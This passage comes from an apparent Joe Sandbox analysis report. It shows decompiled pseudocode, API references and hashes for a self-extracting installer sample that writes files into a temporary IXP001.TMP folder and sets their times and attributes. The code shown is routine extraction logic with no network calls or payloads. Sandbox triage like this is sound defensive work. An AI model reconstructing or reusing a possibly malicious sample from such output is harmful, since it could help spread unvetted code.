                                                                                                                                                                                                      						_t58 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0x3e91e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0x3e91e4;
                                                                                                                                                                                                      						_t30 = E003E4702( &_v268, 0x3e91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E003E476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E003E4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E003E47E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3e93f4 =  *0x3e93f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0x3e91e4;
                                                                                                                                                                                                      						_t63 = 0x3e91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0x3e91e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0x3e91e4;
                                                                                                                                                                                                      						_t30 = E003E4702( &_v268, 0x3e91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E003E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E003E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E003E4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x003e4cd0
                                                                                                                                                                                                      0x003e4cdb
                                                                                                                                                                                                      0x003e4ce0
                                                                                                                                                                                                      0x003e4ce2
                                                                                                                                                                                                      0x003e4cee
                                                                                                                                                                                                      0x003e4cf2
                                                                                                                                                                                                      0x003e4d0e
                                                                                                                                                                                                      0x003e4d0e
                                                                                                                                                                                                      0x003e4d11
                                                                                                                                                                                                      0x003e4e83
                                                                                                                                                                                                      0x003e4e88
                                                                                                                                                                                                      0x003e4e98
                                                                                                                                                                                                      0x003e4e98
                                                                                                                                                                                                      0x003e4d17
                                                                                                                                                                                                      0x003e4d17
                                                                                                                                                                                                      0x003e4d1a
                                                                                                                                                                                                      0x003e4d2f
                                                                                                                                                                                                      0x003e4d2f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d2f
                                                                                                                                                                                                      0x003e4d1c
                                                                                                                                                                                                      0x003e4d1c
                                                                                                                                                                                                      0x003e4d1f
                                                                                                                                                                                                      0x003e4dcb
                                                                                                                                                                                                      0x003e4dd0
                                                                                                                                                                                                      0x003e4dd2
                                                                                                                                                                                                      0x003e4ddd
                                                                                                                                                                                                      0x003e4ddd
                                                                                                                                                                                                      0x003e4de3
                                                                                                                                                                                                      0x003e4de8
                                                                                                                                                                                                      0x003e4ded
                                                                                                                                                                                                      0x003e4ded
                                                                                                                                                                                                      0x003e4def
                                                                                                                                                                                                      0x003e4df0
                                                                                                                                                                                                      0x003e4df0
                                                                                                                                                                                                      0x003e4df4
                                                                                                                                                                                                      0x003e4df4
                                                                                                                                                                                                      0x003e4df6
                                                                                                                                                                                                      0x003e4df9
                                                                                                                                                                                                      0x003e4dfc
                                                                                                                                                                                                      0x003e4dfc
                                                                                                                                                                                                      0x003e4dfe
                                                                                                                                                                                                      0x003e4dff
                                                                                                                                                                                                      0x003e4dff
                                                                                                                                                                                                      0x003e4e03
                                                                                                                                                                                                      0x003e4e08
                                                                                                                                                                                                      0x003e4e0a
                                                                                                                                                                                                      0x003e4e0f
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d03
                                                                                                                                                                                                      0x003e4e18
                                                                                                                                                                                                      0x003e4e20
                                                                                                                                                                                                      0x003e4e25
                                                                                                                                                                                                      0x003e4e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e33
                                                                                                                                                                                                      0x003e4e38
                                                                                                                                                                                                      0x003e4e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e40
                                                                                                                                                                                                      0x003e4e51
                                                                                                                                                                                                      0x003e4e56
                                                                                                                                                                                                      0x003e4e5b
                                                                                                                                                                                                      0x003e4e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e6a
                                                                                                                                                                                                      0x003e4e6f
                                                                                                                                                                                                      0x003e4e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e77
                                                                                                                                                                                                      0x003e4e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4e7d
                                                                                                                                                                                                      0x003e4d25
                                                                                                                                                                                                      0x003e4d25
                                                                                                                                                                                                      0x003e4d28
                                                                                                                                                                                                      0x003e4d36
                                                                                                                                                                                                      0x003e4d3b
                                                                                                                                                                                                      0x003e4d40
                                                                                                                                                                                                      0x003e4d40
                                                                                                                                                                                                      0x003e4d42
                                                                                                                                                                                                      0x003e4d43
                                                                                                                                                                                                      0x003e4d43
                                                                                                                                                                                                      0x003e4d47
                                                                                                                                                                                                      0x003e4d4a
                                                                                                                                                                                                      0x003e4d4a
                                                                                                                                                                                                      0x003e4d4c
                                                                                                                                                                                                      0x003e4d4f
                                                                                                                                                                                                      0x003e4d4f
                                                                                                                                                                                                      0x003e4d51
                                                                                                                                                                                                      0x003e4d52
                                                                                                                                                                                                      0x003e4d52
                                                                                                                                                                                                      0x003e4d56
                                                                                                                                                                                                      0x003e4d5b
                                                                                                                                                                                                      0x003e4d5d
                                                                                                                                                                                                      0x003e4d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d67
                                                                                                                                                                                                      0x003e4d6f
                                                                                                                                                                                                      0x003e4d74
                                                                                                                                                                                                      0x003e4d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d7c
                                                                                                                                                                                                      0x003e4d84
                                                                                                                                                                                                      0x003e4d89
                                                                                                                                                                                                      0x003e4d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d94
                                                                                                                                                                                                      0x003e4d99
                                                                                                                                                                                                      0x003e4d9e
                                                                                                                                                                                                      0x003e4da1
                                                                                                                                                                                                      0x003e4daa
                                                                                                                                                                                                      0x003e4daa
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4da3
                                                                                                                                                                                                      0x003e4db5
                                                                                                                                                                                                      0x003e4dbb
                                                                                                                                                                                                      0x003e4dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4dc3
                                                                                                                                                                                                      0x003e4dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4dc5
                                                                                                                                                                                                      0x003e4dbd
                                                                                                                                                                                                      0x003e4d2a
                                                                                                                                                                                                      0x003e4d2a
                                                                                                                                                                                                      0x003e4d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4d2d
                                                                                                                                                                                                      0x003e4cf8
                                                                                                                                                                                                      0x003e4cfd
                                                                                                                                                                                                      0x003e4d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 003E4DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 003E4DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-2356899610
                                                                                                                                                                                                      • Opcode ID: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                      • Instruction ID: 48c8960df22f2a904d25c7a154211f11c6f63bfbdd3a16c97c1dc4933fc4d2e1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe108a8da025a7603d6a9d687ba56d12111c178492dca8fcb453f7e7564d54b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F04126366001A59BCB238F2ADD447F673A9EB8D300F154769D8829B6C2DA31DE46C790
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0x3e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0x3e8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      0x003e4c40
                                                                                                                                                                                                      0x003e4c4a
                                                                                                                                                                                                      0x003e4c8d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4c70
                                                                                                                                                                                                      0x003e4c70
                                                                                                                                                                                                      0x003e4c7e
                                                                                                                                                                                                      0x003e4c86
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4c8a

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 003E4C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 003E4C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 003E4C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                      • Instruction ID: 4c95d6287f784f2fa7f1928215d5d35915ffd4b62acdccfa9cd7643926d502c4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0fac67975e7c6035fa602ca9a38d373e93d21d9951fdd561c90661ccffed8e86
                                                                                                                                                                                                      • Instruction Fuzzy Hash: EEF0627250125CBB9B26DFA6CC489FB77ACEB0C344B44072AA415C20D0EA30F914D761
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E003E487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E003E490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      0x003e4880
                                                                                                                                                                                                      0x003e488c
                                                                                                                                                                                                      0x003e4894
                                                                                                                                                                                                      0x003e48a0
                                                                                                                                                                                                      0x003e48c9
                                                                                                                                                                                                      0x003e48ce
                                                                                                                                                                                                      0x003e48a2
                                                                                                                                                                                                      0x003e48a8
                                                                                                                                                                                                      0x003e48b7
                                                                                                                                                                                                      0x003e48bc
                                                                                                                                                                                                      0x003e48aa
                                                                                                                                                                                                      0x003e48ac
                                                                                                                                                                                                      0x003e48ac
                                                                                                                                                                                                      0x003e48a8
                                                                                                                                                                                                      0x003e48de
                                                                                                                                                                                                      0x003e48e7
                                                                                                                                                                                                      0x003e490b
                                                                                                                                                                                                      0x003e48ee
                                                                                                                                                                                                      0x003e48f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e4902

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,003E4A23,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E48DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,003E4F67,*MEMCAB,00008000,00000180), ref: 003E4902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                      • Instruction ID: 4b788196f5258f0e2454750387a64e06fcaf728ba37859ae6517cbf8dee5d0de
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0c7b21e62dbfdef5b6b4d005b1e5b40e464944718f0f48ffe8ba2a05b67719e1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0016DA3E115B026F326402A4C88FB7551CCBDA734F1B0334BDEAEB1D2D6A55C0491E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E003E4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0x3e858c; // 0x268
                                                                                                                                                                                                      				_t9 = E003E3680(_t20);
                                                                                                                                                                                                      				if( *0x3e91d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0x3e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0x3e9400; // 0x100c00
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0x3e9400 = _t15;
                                                                                                                                                                                                      							if( *0x3e8184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x3e93f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x003e4ad5
                                                                                                                                                                                                      0x003e4adb
                                                                                                                                                                                                      0x003e4ae7
                                                                                                                                                                                                      0x003e4aee
                                                                                                                                                                                                      0x003e4b05
                                                                                                                                                                                                      0x003e4b0d
                                                                                                                                                                                                      0x003e4b14
                                                                                                                                                                                                      0x003e4b1a
                                                                                                                                                                                                      0x003e4b1c
                                                                                                                                                                                                      0x003e4b21
                                                                                                                                                                                                      0x003e4b2a
                                                                                                                                                                                                      0x003e4b2f
                                                                                                                                                                                                      0x003e4b31
                                                                                                                                                                                                      0x003e4b39
                                                                                                                                                                                                      0x003e4b54
                                                                                                                                                                                                      0x003e4b54
                                                                                                                                                                                                      0x003e4b39
                                                                                                                                                                                                      0x003e4b2f
                                                                                                                                                                                                      0x003e4b0f
                                                                                                                                                                                                      0x003e4b0f
                                                                                                                                                                                                      0x003e4b0f
                                                                                                                                                                                                      0x003e4b5e
                                                                                                                                                                                                      0x003e4ae9
                                                                                                                                                                                                      0x003e4aed
                                                                                                                                                                                                      0x003e4aed

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 003E369F
                                                                                                                                                                                                        • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36B2
                                                                                                                                                                                                        • Part of subcall function 003E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 003E36DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 003E4B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                      • Instruction ID: c371c5b8afd4776e8b0e5f44262d5bc79b09c345c6d6b61c18978a56a13ae6cc
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 51cd4fd802f0bed0d485f76b0f79219554b8b2233a1c30a13603f50e37aa0dfe
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7018031600295ABDB278F6ADC85BA2775EF748725F058325F9799F5E0CB70D811CB40
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E003E658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0x3e8b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0x3e8b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E003E16B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
